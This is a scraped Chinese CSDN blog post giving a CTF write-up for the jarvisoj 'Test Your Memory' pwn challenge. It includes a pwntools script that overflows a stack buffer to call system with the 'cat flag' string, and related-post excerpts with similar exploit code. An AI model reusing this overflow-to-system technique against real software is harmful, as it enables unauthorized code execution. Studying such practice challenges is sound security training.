buuoj jarvisoj_test_your_memory

最新推荐文章于 2023-05-18 10:27:46 发布

「已注销」

最新推荐文章于 2023-05-18 10:27:46 发布

阅读量296

点赞数

分类专栏： pwn

本文链接：https://blog.csdn.net/pondzhang/article/details/105128840

版权

pwn 专栏收录该内容

38 篇文章 0 订阅

订阅专栏

存在溢出漏洞：
在这里插入图片描述
进行了逻辑判断，相等则输出good job！！！

从堆栈上看，s2在return地址下面。

整合上面，便于脚本如下：

from pwn import*

p = process('./memory')

system_addr = 0x08048440

catflag_addr = 0x080487E0

payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)

p.sendline(payload)

p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

20210913_test_your_nc

m0_51187558的博客

09-13

3067

20210913_test_your_nc 每日一题的第一周，来一起做一道究极入门的pwn题吧。首先按照网址链接打开题。题目叫做test your nc，也就是“测试你的nc”。这看起来像是一个提示–很多ctf题都会把考察的方向作为题目的文件名，以给予做题者一个思路或者学习的方向。但是nc又是什么呢？我们先把题目文件下载下来，看看具体的东西吧。从文件管理中我们可以发现我们下载下来的题目叫做test，并且没有任何后缀。回忆一下，windows系统里是不是几乎所有你看到可以执行的软件的后缀都是e

BUUCTF_PWN_test_your_nc详细题解

qq_46238551的博客

10-20

3102

test_your_nc_1 IDA PRO查看主函数发现system("/bin/sh")，从主函数进入则执行getshell，所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析，b main下主函数断点，r运行，看一下跳转到system函数后具体的执行过程 n单步执行，将程序调整到运行system函数之前 n单步执行，运行system(“/bin/sh”)，观察getshell 本地gdb调试成功后，运行exp拿到flag exp.py ``..

参与评论您还未登录，请先登录后发表或查看评论

[BUUCTF]PWN——jarvisoj_test_your_memory

mcmuyanga的博客

11-06

500

jarvisoj_test_your_memory 附件步骤：例行检查，32位程序，开启了nx保护试运行一下程序，看看大概的情况 32

jarvisoj_test_your_memory

m0sway的博客

12-27

1262

jarvisoj_test_your_memory 使用checksec查看：只开启了栈不可执行，应该还是一道栈溢出题目。放进IDA中查看：先是用printf()输出了一个不知道什么玩意的东西然后调用men_test() 跟进查看men_test()： printf("0x%x \n", hint);：输出了hint的地址 __isoc99_scanf("%s", &s);：存在栈溢出，距离ebp0x13 题目思路：题目存在栈溢出，可以进行溢出调用system 题目

BUUCTF pwn——jarvisoj_test_your_memory

CNS-Enterprise BCC-1701-J

05-18

125

BUUCTF 做题练习

Jarvis oj Test your Memory writeup

ditto的博客

01-05

871

简单的ret2plt 检查下防护，只开了NX。放ida里：问题出在mem_test函数里：点开hint，发现了有"cat flag"这个字符串：而且还在rodata区里，那直接硬编码就可以了。程序本身调用了system函数，那直接ret2plt就行了。根据ida计算出溢出点：溢出点0x13+4。编写exp： from pwn import* a=remote("p...

机器学习之train_test_split详解

热门推荐

执的博客

09-12

4万+

文章目录前言一.train_test_split是什么？二、使用步骤1.引入库2.读入数据3.参数意义总结前言 train_test_split是python在机器学习中常常需要用到的一个方法安装方法：pip install sklearn 导入方法：from sklearn.model_selection import train_test_split 一.train_test_split是什么？ train_test_split方法能够将数据集按照用户的需要指定划分为训练集和测试集/ 二、.

X_train,X_test,y_train,y_test有什么区别？

一个程序媛的成长记录❤

05-28

3万+

感谢这两篇博客： https://www.jianshu.com/p/075877ace8c3 https://blog.csdn.net/jiushinayang/article/details/81098186 看着这一行代码 X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.2,random...

Sklearn : train_test_split()函数的用法

DebugYing的博客

01-13

4551

Sklearn : train_test_split()函数的用法

jarvisoj——Test Your Memory

王嘟嘟的博客

07-31

761

题目 Wp 基本项检查，32位，开了NX，got表可写这里看到alphanum_2626和mem_test 跟进mem_test，可以看到是scanf 这里可以看到偏移，直接上payload 这里一定要有返回地址，不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e

buuctf jarvisoj_test_your_memory

carol2358的博客

05-06

341

运行可以看到泄露了cat flag的data的位置，在程序里可以看到system，栈溢出就行了 exp： from pwn import * from LibcSearcher import * local_file = './memory' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2...

[JarvisOJ][pwn]Test Your Memory

九层台

07-06

840

经历了前面２次的艰难，出题人或许嫌我们太累了，来了个简单的走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数，然后找漏洞吧 int __cdecl mem_test(char *s2) {...

[Jarvis OJ - PWN]——Test Your Memory

Y_peak的博客

02-16

223

[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad

18.9.20 Jarvis OJ PWN----Test Your Memory

qq_42192672的博客

09-20

328

先checksec一下可以栈溢出放到IDA里看一下，发现有system函数（在函数with_func中调用），喜出望外，同时搜索字符串时，可以发现打开flag的指令，如下再看一下哪里可以溢出，在mem_test函数中，scanf就可以溢出直接上脚本吧 #代码主体 system_addr=bin.symbols['win_func'] payload='a'*(0x...

JarvisOJ pwn Test Your Memory

苗_的博客

02-24

259

先找到几个关键函数：单击main看一下函数结构：点进mem_test看下：找到溢出点：scanf 点进去hint发现了cat flag字符串..... （问题突然变得很简单....ret2libc） exp： from pwn import * #p = process('./memory') p = remote("pwn2.jarvisoj.com","9876") ...

train_test_split 函数作用